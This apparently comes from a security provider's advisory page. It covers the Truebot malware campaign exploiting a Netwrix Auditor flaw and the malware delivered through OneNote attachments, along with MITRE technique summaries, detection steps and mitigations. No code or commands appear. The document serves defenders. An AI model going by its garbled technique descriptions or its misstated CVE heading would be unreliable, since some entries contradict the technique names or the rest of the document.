Cybersecurity Advisories

AA23-187A: Truebot Malware Infects Networks in U.S. and Canada

The CISA, FBI, MS-ISAC, and CCCS have released a joint cybersecurity advisory regarding cyber threat actors leveraging newly identified Truebot malware variants against organizations in the United States and Canada. These attacks are exploiting a critical remote code execution (RCE) vulnerability, tracked as CVE-2022-31199 (CVSSv3 score: 9.8 – Critical), in the Netwrix Auditor software to deliver Truebot. Threat actors are leveraging this flaw to gain initial access and move laterally within the compromised network. 

Truebot is a botnet that is linked to the Russian-speaking Silence cybercrime group and used by TA505 hackers (associated with the FIN11 group) to deploy Clop ransomware on compromised networks since December 2022. Previous malware variants of Truebot were primarily delivered by cyber threat actors via malicious phishing email attachments. However, recent versions allow them to also gain initial access through exploiting CVE-2022-31199, enabling deployment of the malware at scale within the compromised environment. Based on the nature of observed Truebot operations, the main goal of the adversaries is to steal sensitive information from compromised systems for financial gain. 

The malware has also been used alongside other malware in attacks. In several incidents, shortly after Truebot was executed, the Cobalt Strike tool was deployed for persistence and data exfiltration purposes. In addition, some phishing campaigns consisted of the FlawedGrace RAT being deployed only minutes after the Truebot malware was executed. Researchers have also found Truebot attacks leveraging a custom data exfiltration tool called “Teleport” that was used to steal information. 

When an organization is infected with Truebot, it can quickly escalate to become a bigger infection, similarly to how ransomware spreads throughout a network. The change in delivery vector shows that attacks leveraging the malware are continuing to evolve. 

CVE-2022-3199 Delivery Method for Truebot 

SecurIT360 SOC Managed Services     

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:    

MDR Services    

  • We utilize several threat feeds that are updated frequently on a daily basis.  
  • In addition to our automatic threat feeds, we have added known indicators of compromise related to this threat into our MDR solution, FortiSIEM.    

EDR Services    

  • In addition to ongoing vendor IoC updates, we have added known indicators of compromise related to this threat into our EDR solutions to help with detection.     

Indicators are provided in the Indicators of Compromise section below for your reference.   

As always, if we detect activity related to these exploits, we will alert you when applicable.    

Please feel free to contact the SOC via email ( or telephone (844-474-1244) if you have any questions or concerns.     


  • All Netwrix Auditor customers are advised to upgrade to version 10.5.10977.0 and ensure that no Netwrix Auditor systems are exposed to the internet. 
  • CISA has posted guidelines and recommends organizations to mandate MFA for all staff and services. 

MITRE Summary 

Technique Title 



Initial Access 


Replication Through Removable Media 


Cyber threat actors use removable media drives to deploy Raspberry Robin malware. 

Drive-by Compromise 


Cyber threat actors embed malicious links or attachments within web domains to gain initial access. 

Exploit Public-Facing Application 


Cyber threat actors are exploiting Netwrix vulnerability CVE-2022-31199 for initial access with follow-on capabilities of lateral movement through remote code execution. 



Truebot actors can send spear phishing links to gain initial access. 



Command and Scripting Interpreter 


Cyber threat actors have been observed dropping cobalt strike beacons as a reverse shell proxy to create persistence within the compromised network. 

Cyber threat actors use FlawedGrace to receive PowerShell commands over a C2 channel to deploy additional tools. 

Shared Modules 


Cyber threat actors can deploy malicious payloads through obfuscated share modules. 

User Execution: Malicious Link 


Cyber threat actors trick users into clicking a link by making them believe they need to perform a Google Chrome software update. 



Hijack Execution Flow: DLL Side-Loading 


Cyber threat actors use Raspberry Robin, among other toolsets to side-load DLLs to maintain persistence. 

Privilege Escalation 


Boot or Logon Autostart Execution: Print Processors 


FlawedGrace malware manipulates print spooler functions to achieve privilege escalation. 

Defense Evasion 


Obfuscated Files or Information 


Truebot uses a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP), to create a GUID. 

Obfuscated Files or Information: Binary Padding 


Cyber threat actors embed around one gigabyte of junk code within the malware string to evade detection protocols. 

Masquerading: Masquerade File Type 


Cyber threat actors hide Truebot malware as legitimate appearing file formats. 

Process Injection 


Truebot malware has the ability to load shell code after establishing a C2 connection. 

Indicator Removal: File Deletion 


Truebot malware implements self-deletion TTPs throughout its attack cycle to evade detection. 

Teleport exfiltration tool deletes itself after it has completed exfiltrating data to the C2 station. 

Modify Registry 


FlawedGrace is able to modify registry programs that control the order that documents are loaded to a print que. 

Reflective Code Loading 


Truebot malware has the capability to load shell code and deploy various tools to stealthily navigate an infected network. 

Credential Access 


OS Credential Dumping: LSASS Memory 


Cyber threat actors use cobalt strike to gain valid credentials through LSASS memory dumping. 



System Network Configuration Discovery 


Truebot malware scans and enumerates the affected system’s domain names. 

Process Discovery 


Truebot malware enumerates all running processes on the local host. 

System Information Discovery 


Truebot malware scans and enumerates the OS version information, and processor architecture. 

Truebot malware enumerates the affected system’s computer names. 

System Time Discovery 


Truebot has the ability to discover system time metrics, which aids in enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks. 

Software Discovery: Security Software Discovery 


Truebot has the ability to discover software security protocols, which aids in defense evasion. 

Debugger Evasion 


Truebot malware scans the compromised environment for debugger tools and enumerates them in effort to evade network defenses. 

Lateral Movement 


Exploitation of Remote Services 


Cyber threat actors exploit CVE-2022-31199 Netwrix Auditor vulnerability and use its capabilities to move laterally within a compromised network. 

Use Alternate Authentication Material: Pass the Hash 


Cyber threat actors use cobalt strike to authenticate valid accounts 

Remote Service Session Hijacking 


Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods. 

Remote Service Session Hijacking: RDP Hijacking 


Cyber threat actors use cobalt strike to hijack remote sessions using SSH and RDP hijacking methods. 

Lateral Tool Transfer 


Cyber threat actors deploy additional payloads to transfer toolsets and move laterally. 



Data from Local System 


Truebot malware checks the current version of the OS and the processor architecture and compiles the information it receives. 

Screen Capture 


Truebot malware takes snapshots of local host data, specifically processor architecture data, and sends that to a phase 2 encoded data string. 

Truebot gathers and compiles compromised system’s host and domain names. 

Command and Control 


Application Layer Protocol 


Cyber threat actors use teleport exfiltration tool to blend exfiltrated data with network traffic. 

Non-Application Protocol 


Cyber threat actors use Teleport and FlawedGrace to send data over custom communication protocol. 

Ingress Transfer Tool 


Cyber threat actors deploy various ingress transfer tool payloads to move laterally and establish C2 connections. 

Encrypted Channel: Asymmetric Cryptography 


Cyber threat actors use Teleport to create an encrypted channel using AES. 



Scheduled Transfer 


Teleport limits the data it collects and syncs with outbound organizational data/network traffic. 

Data Transfer Size Limits 


Teleport limits the data it collects and syncs with outbound organizational data/network traffic. 

Exfiltration Over C2 Channel 


Cyber threat actors blend exfiltrated data with network traffic to evade detection. 

Cyber threat actors use the Teleport tool to exfiltrate data over a C2 protocol. 

Indicators of Compromise 

Resources & Related Articles 


Cybersecurity Advisories

Hackers Use Microsoft OneNote Attachments to Spread Malware


Malicious actors are using a new file format in the form of Microsoft OneNote attachments to spread malware to targets. Since OneNote allows users to insert attachments into a NoteBook, threat actors are abusing this feature by attaching malicious VBS attachments that automatically launch the script when double-clicked to download malware from a remote site and install it. Because the attachments look like a file’s icon in OneNote, threat actors overlay a large ‘Double click to view file’ bar over the inserted VBS attachments to hide them. If the ‘Click to View Document’ bar is moved out of the way, it can be observed that the malicious attachment includes multiple attachments. The threat actors did this in a way that if a user double clicks anywhere on the bar, it’s second click will land on the attachment, resulting in launching the malware. Luckily, when launching the OneNote attachments, the program provides a warning before installation. However, if a victim ignores the warning and clicks OK, it will launch the VBS script to download and install malware. This will allow the threat actor to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams.  

Fake DHL Email with OneNote Attachment 

Malicious OneNote Email Attachment

SecurIT360 SOC Managed Services 

If you utilize our SOC Managed Services, here are the actions we are taking to help detect this activity:  

MDR Services 

  • We have added indicators related to known malicious threat actors into our blocklists in our MDR solution, FortiSIEM.  
  • Indicators are provided in the Indicators of Compromise section below if you would like to proactively block them in your firewall.  

EDR Services 

  • In addition to ongoing vendor IoC updates, we have implemented known IoC information to help with detection.   

As always, if we detect activity related to these exploits, we will alert you when applicable.  


  • The best way to protect against malicious attachments is to simply not open files from people you do not know. If a file is mistakenly opened, do not disregard the warnings displayed by the operating system or application.  
  • If you see a warning that opening an attachment or link could harm your computer or files, simply do not press OK and close the application.  
  • If you feel it may be a legitimate email, share it with a security or Windows admin to help you verify if the file is safe.  
  • Consider blocking “.one” attachments. See: 
  • OneNote users are recommended to enable multi-factor authentication, use antivirus protection, and follow the best security practices for preventing phishing attacks.    


SOC Prime has released rules to detect cyber attacks abusing OneNote attachments. Click here to access the full list of relevant detection content.  

MITRE Summary 

  • TA0002 – Execution 
  • T1047 – Windows Management Instrumentation  
  • TA0005 – Defense Evasion  
  • T1027 – Obfuscated Files or Information  
  • T1036 – Masquerading  
  • T1070.006 – Timestomp 
  • T1497 – Virtualization/Sandbox Evasion 
  • T1562.001- Disable or Modify Tools  
  • TA0006 – Credential Access  
  • T1003 – OS Credential Dumping  
  • TA0007 – Discovery 
  • T1057 – Process Discovery  
  • T1082 – System Information Discovery  
  • T1012 – Query Registry  
  • T1016 – System Network Configuration Discovery  
  • T1083 – File and Directory Discovery  TA0009 – Collection 
  • T1005 – Data from Local System  
  • TA0011 – Command and Control  
  • T1071 – Application Layer Protocol  

Indicators of Compromise (IoCs) 

Resources & Related Articles